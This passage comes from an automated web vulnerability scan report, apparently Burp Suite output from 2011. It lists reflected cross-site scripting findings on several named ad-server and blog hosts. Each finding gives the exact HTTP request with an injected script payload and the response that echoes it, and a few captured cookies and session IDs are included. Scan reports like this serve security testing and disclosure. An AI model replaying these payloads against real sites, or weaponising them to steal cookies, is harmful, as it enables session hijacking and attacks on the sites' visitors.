Set-Cookie: sglst=20f0s0tllegh2b1wbng01h1404070g20p5b0lf17qo000000181404070g20pag2leqh191mboi01f1404070g20p82hlebnns1ucve00z100006002005q8lebnns1ucve00k10000600200b0clfjpei0pe9y0141404070g20p7gdlgcqt5001wm00414040704204b1alfjpei0pe9y0141404070g20pb08lfjpei0pe9y0141404070g20p45mlfdxmc000000151404070g20p5l4lgcqt5001wm00414040704204aanlebnns1xg0o00o12000700200ab4lebnns1xg0o01i1404070g20pb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 09 Feb 2011 14:10:39 GMT
Content-Length: 1602

<a href="http://ad.media6degrees.com/adserv/clk?tId=6210453202168737|cId=4814|cb=1297260612|notifyPort=8080|tpCId=153250|exId=9|tId=6210453202168737|foo=bar|tpSecId=233753|ec=1|vurlId=424|secId=56|pri
...[SNIP]...
ofileId%255C%2522:289%257D/referrer=http%253A%252F%252Ftechnorati.com%252Fcontact-us%252F%253Fbd8fa%252522%25253E%25253Cscript%25253Ealert%25281%2529%25253C%252Fscript%25253E09ae0dbaead%253D1/clickenc=467de"><script>alert(1)</script>0330d190362http://roia.biz/im/n/KSmZvq1BAAGL30MAAAsXQgAAqVNmMQA-A/" target="_blank">
...[SNIP]...

1.22. http://ad.media6degrees.com/adserv/cs [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.media6degrees.com
Path:   /adserv/cs

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4b38"><script>alert(1)</script>ad4afdf7ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserv/cs?adType=iframe|is_preview=0|cId=4814|ec=1|spId=19013|advId=651|tpCId=153250|exId=9|price=0.200000|vurlId=424|srcUrlEnc=http://technorati.com/contact-us/?bd8fa%22%3E%3Cscript%3Ealert(1)%3C/script%3E09ae0dbaead=1|notifyServer=asd132.sd.pl.pvt|notifyPort=8080|bid=0.20000000298023224|tId=6210453202168737|pubId=51|invId=117|secId=56|tpSecId=233753|foo=bar|cb=1297260612|ctrack=http://ib.adnxs.com/click/AQAAoJmZyT-amZlhj8LFPwAAAKCZmfE_mpmZYY_CxT8AAACgmZnJP8giKVhwODcdBWHfHSmrEEJEoFJNAAAAABmRAwA2AQAAfAAAABkAAACiVgIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEoQMAAgUCAAIAAAAAMiEewAAAAAA./cnd=%257B%255C%2522m6ClientId%255C%2522:835342505348660275,%255C%2522transactionId%255C%2522:6210453202168737,%255C%2522marketerId%255C%2522:651,%255C%2522campaignId%255C%2522:3231,%255C%2522spendId%255C%2522:19013,%255C%2522spendWeight%255C%2522:200,%255C%2522creativeId%255C%2522:4814,%255C%2522spendCreativeId%255C%2522:158392,%255C%2522adProfileId%255C%2522:289%257D/referrer=http%253A%252F%252Ftechnorati.com%252Fcontact-us%252F%253Fbd8fa%252522%25253E%25253Cscript%25253Ealert%25281%2529%25253C%252Fscript%25253E09ae0dbaead%253D1/clickenc=&f4b38"><script>alert(1)</script>ad4afdf7ec=1 HTTP/1.1
Host: ad.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://technorati.com/contact-us/?bd8fa%22%3E%3Cscript%3Ealert(1)%3C/script%3E09ae0dbaead=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=3lebnns040r044nssk122m1boph1c4wn1bw2l1bw321bw2o1bw501bw3n1bw4o1bw3c1bw301bw5f1bw4e1bw381bw3l1bw2m1bw2c1bw351bw481bw2v1bw4h1bw4x1bw4b1bw361bw3z1bw4f1bw4w1bw4g1bw331bw431bw2q1bw4z1bw2b1bw441bw2r1bw5e1bw3f1bw521bw3p1bw5a1bw311bw4r1bw5d1bw5j1bw421bw2p1bw3x1bw5g1bw2i1bw4a1bw3b1bw531bw4p1bw3q1bw541bw3r1bw4q1bw4j1bw461bw2t1bw3m1bw4y1bw4s1bw2z1bw4c1bw2k1bw3v1bw4i1bw4t1bw3a1bw451bw2s1bw2j1bw4n1bw3e1bw591bw3w1bw401bw2n1bw3u1bw341bw4u1bw3k1bw491bw2w1bw5b1bw561bw3t1bw511bw551bw3s1bw471bw2u1bw5i1bw4l3ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z32te12011xg0o4jaec12011ucve1l054e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g1844g184561843t1847c1847g1843f1844a1847v1843m1844m184721845p1848e1844q1848c1843h1842y1847d1848d1844t1845x1847q1845k184711845o1846i1844f184791845w1845d184581844h1843v1847o18434184691845t184531844w1844e184881846v1844v4qbzj12011yfhj4fhux122u000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru000000000000000000000000000000000004esx7120104tej49wpz12011w3py0s018raevpblc12011xh931o018EstvP2qn112s1o9ct1oa791oa5w1oa8b1oa601oa8j1oa6z1oa871oa6u1oa8f1oa7b1oa7l1oa6x1oa8l1oa6m1oa7i1oa8h1oa6h1oa8e1oa5z1oa8s1oa7n1oa6e1oa7k1oa741oa5r1oa7h1oa5l1oa5k1oa611oa7w1oa8g1oa911oa7o1oa5m1oa6l1oa681oa8c1oa5h1oa831oa8o1oa8n1oa7f1oa6f1oa7x1oa721oa771oa701oa7j1oa7a1oa801oa7g1oa6n1oa761oa5t1oa8i1oa841oa8t1oa8m1oa7y1oa921oa5i1oa6y1oa931oa821oa7u1oa941oa8d1oa631oa6t1oa651oa7d1oa8v1oa6j1oa891oa6w1oa5j1oa881oa7t1oa6v1oa7s1oa8z1oa8p1oa811oa6o1oa8u1oa691oa731oa5q1oa6g1oa8q1oa7e1oa5y1oa751oa5s1oa641oa7v1oa781oa5v1oa6k; acs=015020a0e0f0g1lebnnsxzt11xg0oxzt12135dxzt11xqnrxzt11xg0o; adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; orblb=2lfk1rn0225810u020lxik0hlmv2dh10u0100000; clid=2lebnns011706ch47d7o8wtv214tf01h1403070f20o; rdrlst=41d0o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000x1blebnns1wj3q01411000w3clebnns1wj3q01411000jv6lebnns1wj3q01411000j4ilew2e20000001b14030fullf8gij00000015140310f6lg1nei0000000n140300c9lfk1rn0000001214031196lfzx0l0000000o14030jillebnns1wj3q01411001195lg7rdq0000000f14031194lg3y5y0000000l14030y7blg94wv0000000614030cajlfk1rn0000001214030p7vlebnns1xgc001b12001192lg5l2h0000000k140310tylg60ji0000000g140310ellg1nei07gla00h12000xuklebnns0000001h140310telg60j60000000i14030yh0lebnns1wj3q014110010e9lg1nei0000000n14030jwblfk1rn0o4zv00p110007dpletz4d0000001d14030mmnlebnns1wj3q014110010e5lg1nei0000000n140310rdlg1vir087mk00m14030mzklgcsh70000000114010eh5lf17qf00000019140306bylemlne0000001f14030df5lgcqt50000000314030mzqlgcsgy00000002140207gmlebnns1wj3q01411000xthlebnns1xgc001b12000im3lgcqt50000000314030fuqlegh2b0000001g14030b6mlf17qk0000001814030mz1lebnns1wj3q01411000y63lg93og00000008140307vglfk1rn0000001214030xvslebnns1wj3q01411000x1jlebnns1wj3q01411000jk7lebnns1wj3q01411000cbnlfk1rn0000001214030yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q0141100; sglst=20f0s0tllegh2b1wbew01g1403070f20o5b0lf17qo000000171403070f20oag2leqh191mbfy01e1403070f20o82hlebnns1ucve00z100006002005q8lebnns1ucve00k10000600200b0clfjpei0pe9y0131403070f20o7gdlgcqt5001o200314030703203b1alfjpei0pe9y0131403070f20ob08lfjpei0pe9y0131403070f20o45mlfdxmc000000141403070f20o5l4lgcqt5001o200314030703203aanlebnns1xg0o00o12000700200b0olfjpei0pe9y00v12000700200ab4lebnns1xg0o01h1403070f20o9szlebnns1xg0o01912000700200

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh="1lf17qo16033e7s0103901WEF/RAmuh01bkz326030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000"; Version=1; Domain=media6degrees.com; Max-Age=15552000; Path=/
Set-Cookie: clid=2lebnns011706ch47d7o8wtv2151z01i1404070g20p; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
Set-Cookie: orblb=2lfk1rn0225810u020lxik0hlmv2dh10u0100000; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
Set-Cookie: rdrlst=41d0o2ylebnns1wj3q01411000xo1lebnns1wj3q01411000x1blebnns1wj3q01411000w3clebnns1wj3q01411000jv6lebnns1wj3q01411000j4ilew2e20000001c14040fullf8gij00000016140410f6lg1nei0000000o140400c9lfk1rn0000001314041196lfzx0l0000000p14040jillebnns1wj3q01411001195lg7rdq0000000g14041194lg3y5y0000000m14040y7blg94wv0000000714040cajlfk1rn0000001314040p7vlebnns1xgc001b12001192lg5l2h0000000l140410tylg60ji0000000h140410ellg1nei07gla00h12000xuklebnns0000001i14040yh0lebnns1wj3q014110010telg60j60000000j140410e9lg1nei0000000o14040jwblfk1rn0o4zv00p110007dpletz4d0000001e14040mmnlebnns1wj3q014110010e5lg1nei0000000o140410rdlg1vir087mk00n14040mzklgcsh70000000214020eh5lf17qf0000001a140406bylemlne0000001g14040df5lgcqt50000000414040mzqlgcsgy00000003140307gmlebnns1wj3q01411000xthlebnns1xgc001b12000im3lgcqt50000000414040fuqlegh2b0000001h14040b6mlf17qk0000001914040mz1lebnns1wj3q01411000y63lg93og00000009140407vglfk1rn0000001314040xvslebnns1wj3q01411000x1jlebnns1wj3q01411000jk7lebnns1wj3q01411000cbnlfk1rn0000001314040yiplebnns1wj3q01411000xwflebnns1wj3q01411000e4vlebnns1wj3q01411000xwblebnns1wj3q0141100; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
Set-Cookie: sglst=20f0s0tllegh2b1wbng01h1404070g20p5b0lf17qo000000181404070g20pag2leqh191mboi01f1404070g20p82hlebnns1ucve00z100006002005q8lebnns1ucve00k10000600200b0clfjpei0pe9y0141404070g20p7gdlgcqt5001wm00414040704204b1alfjpei0pe9y0141404070g20pb08lfjpei0pe9y0141404070g20p45mlfdxmc000000151404070g20p5l4lgcqt5001wm00414040704204aanlebnns1xg0o00o12000700200ab4lebnns1xg0o01i1404070g20pb0olfjpei0pe9y00v120007002009szlebnns1xg0o01912000700200; Domain=media6degrees.com; Expires=Mon, 08-Aug-2011 14:10:39 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 09 Feb 2011 14:10:39 GMT
Content-Length: 1604

<a href="http://ad.media6degrees.com/adserv/clk?tId=6210453202168737|cId=4814|cb=1297260612|notifyPort=8080|tpCId=153250|exId=9|tId=6210453202168737|foo=bar|tpSecId=233753|ec=1|vurlId=424|secId=56|pri
...[SNIP]...
fileId%255C%2522:289%257D/referrer=http%253A%252F%252Ftechnorati.com%252Fcontact-us%252F%253Fbd8fa%252522%25253E%25253Cscript%25253Ealert%25281%2529%25253C%252Fscript%25253E09ae0dbaead%253D1/clickenc=&f4b38"><script>alert(1)</script>ad4afdf7ec=1http://roia.biz/im/n/KSmZvq1BAAGL30MAAAsXQgAAqVNmMQA-A/" target="_blank">
...[SNIP]...

1.23. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.technoratimedia.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7709"-alert(1)-"ffdd1267572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?pfm=1&tblg=ch&tphv=ch&ttch=ch&titn=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&atf=0&uatRandNo=50691&ad_type=ad&section=974763&ad_size=728x90&e7709"-alert(1)-"ffdd1267572=1 HTTP/1.1
Host: ad.technoratimedia.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:58:25 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 09 Feb 2011 13:58:25 GMT
Pragma: no-cache
Content-Length: 4420
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ad.technoratimedia.com/imp?Z=728x90&atf=0&brw=cr3&e7709"-alert(1)-"ffdd1267572=1&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=974763&tblg=ch&titn=ch&tphv=ch&ttch=ch&uatRandNo=50691&_salt=4091159364";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_cre
...[SNIP]...

1.24. http://addyosmani.com/blog/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96792"><script>alert(1)</script>e6f5e4a121f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 96792\"><script>alert(1)</script>e6f5e4a121f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/?96792"><script>alert(1)</script>e6f5e4a121f=1 HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:26:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=30f944fb8c0472d1829671af23f2bad5; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/?96792\"><script>alert(1)</script>e6f5e4a121f=1"/>
...[SNIP]...

1.25. http://addyosmani.com/blog/essentialjsdesignpatterns/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/essentialjsdesignpatterns/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70566"><script>alert(1)</script>e9d89fba107 was submitted in the REST URL parameter 2. This input was echoed as 70566\"><script>alert(1)</script>e9d89fba107 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/essentialjsdesignpatterns70566"><script>alert(1)</script>e9d89fba107/ HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:26:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ec17ae947de819386fe37699933b582e; path=/
Last-Modified: Wed, 09 Feb 2011 13:26:54 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/essentialjsdesignpatterns70566\"><script>alert(1)</script>e9d89fba107/"/>
...[SNIP]...

1.26. http://addyosmani.com/blog/essentialjsdesignpatterns/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/essentialjsdesignpatterns/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e263"><script>alert(1)</script>5b3cd140196 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1e263\"><script>alert(1)</script>5b3cd140196 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/essentialjsdesignpatterns/?1e263"><script>alert(1)</script>5b3cd140196=1 HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:26:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Link: <http://addyosmani.com/blog/?p=1685>; rel=shortlink
Set-Cookie: PHPSESSID=e6b348a66c2f9b345871a175b8423572; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 106966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/essentialjsdesignpatterns/?1e263\"><script>alert(1)</script>5b3cd140196=1"/>
...[SNIP]...

1.27. http://addyosmani.com/blog/video-jquerysub-explained/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/video-jquerysub-explained/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b83d0"><script>alert(1)</script>01527fc4429 was submitted in the REST URL parameter 2. This input was echoed as b83d0\"><script>alert(1)</script>01527fc4429 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/video-jquerysub-explainedb83d0"><script>alert(1)</script>01527fc4429/ HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 13:26:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=e0ffb189850799aad2ff388ee6386d0b; path=/
Last-Modified: Wed, 09 Feb 2011 13:26:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/video-jquerysub-explainedb83d0\"><script>alert(1)</script>01527fc4429/"/>
...[SNIP]...

1.28. http://addyosmani.com/blog/video-jquerysub-explained/ [d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/video-jquerysub-explained/

Issue detail

The value of the d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bacd2"><script>alert(1)</script>7fca595e38e was submitted in the d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada parameter. This input was echoed as bacd2\"><script>alert(1)</script>7fca595e38e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1bacd2"><script>alert(1)</script>7fca595e38e HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bf568d6e53faae5c61af487f77294103; __utmz=15855846.1297258315.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=15855846.1800733643.1297258315.1297258315.1297258315.1; __utmc=15855846; __utmb=15855846.1.10.1297258315; __qca=P0-724382038-1297258315164

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:31:48 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie,Accept-Encoding
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Link: <http://addyosmani.com/blog/?p=2456>; rel=shortlink
Content-Type: text/html; charset=UTF-8
Content-Length: 43420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1bacd2\"><script>alert(1)</script>7fca595e38e"/>
...[SNIP]...

1.29. http://addyosmani.com/blog/video-jquerysub-explained/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/video-jquerysub-explained/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d182c"><script>alert(1)</script>8aad83cada was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d182c\"><script>alert(1)</script>8aad83cada in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/video-jquerysub-explained/?d182c"><script>alert(1)</script>8aad83cada=1 HTTP/1.1
Host: addyosmani.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:26:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie
X-Pingback: http://addyosmani.com/blog/xmlrpc.php
Link: <http://addyosmani.com/blog/?p=2456>; rel=shortlink
Set-Cookie: PHPSESSID=3a0c84f3ca5b4d97aa560d444345daf6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://addyosmani.com/blog/video-jquerysub-explained/?d182c\"><script>alert(1)</script>8aad83cada=1"/>
...[SNIP]...

1.30. http://addyosmani.com/blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://addyosmani.com
Path:   /blog/wp-content/plugins/wp-pagenavi/pagenavi-css.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e97e5"><script>alert(1)</script>252c8af24fe was submitted in the REST URL parameter 2. This input was echoed as e97e5\"><script>alert(1)</script>252c8af24fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-contente97e5"><script>alert(1)</script>252c8af24fe/plugins/wp-pagenavi/pagenavi-css.css?ver=2.50 HTTP/1.1
Host: addyosmani.com
Proxy-Connection: keep-alive
Referer: http://addyosmani.com/blog/video-jquerysub-explained/?d182c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8aad83cada=1
Accept: text/css,*/*;q=0.1
